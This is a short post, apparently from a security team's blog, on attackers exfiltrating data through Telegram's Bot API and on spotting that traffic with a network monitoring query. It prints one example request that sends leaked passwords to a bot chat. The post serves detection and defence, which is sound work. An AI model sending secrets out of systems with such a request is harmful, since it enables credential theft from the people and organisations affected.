A cart full of hackers
More in General
- We helped Apple fix a vulnerability in the kernel of its operating systems
We helped Apple fix a vulnerability in the kernel of its operating systems PT ESC expert…
- Recovering EVTX records: carving methods
Recovering EVTX records: carving methods 🧩 When investigating incidents where attackers encrypt virtual machine images, a…
- Operation Chewbacca
At the end of June, the PT ESC team, during incident investigations, discovered a new group…
- Your Zimbra server is at risk
Recently, our PT ESC IR team encountered a new attack by ransomware groups on Zimbra mail…
- He's not your gsocket
He's not gsocket to you 😑 During the investigation of one of the incidents, PT ESC…
Hackers’ Telegram Cart
According to the latest trends (e.g., Lazy Koala), attackers are increasingly resorting to data exfiltration or C2 channels via the Telegram messenger.
It really is that simple: just send a web request like this to transfer sensitive information (e.g., passwords) from any computer on your infrastructure:
https://api.telegram.org/bot$BOT_TOKEN/sendMessage?text=LEAKED_PASSWORDS&chat_id=xxxx
Thus, attackers try to hide their network activity within streams of legitimate Telegram network sessions, which are now used almost everywhere.
Attackers overlooked just one thing: network traffic from the desktop or mobile Telegram app and a web request to the API are very different.
The Telegram API is also an automation and bot management tool. If your organization does use it, it is from specific hosts and in limited quantities.
🚩 The appearance of such requests from a user’s machine is a red flag for your security tools. And finding such network sessions is easy — with a single query to an NTA system:
tls.server_name == "api.telegram.org"
#detect #network #tip
@ptescalator
More in General
- We helped Apple fix a vulnerability in the kernel of its operating systems
We helped Apple fix a vulnerability in the kernel of its operating systems PT ESC expert…
- Recovering EVTX records: carving methods
Recovering EVTX records: carving methods 🧩 When investigating incidents where attackers encrypt virtual machine images, a…
- Operation Chewbacca
At the end of June, the PT ESC team, during incident investigations, discovered a new group…
- Your Zimbra server is at risk
Recently, our PT ESC IR team encountered a new attack by ransomware groups on Zimbra mail…
- He's not your gsocket
He's not gsocket to you 😑 During the investigation of one of the incidents, PT ESC…







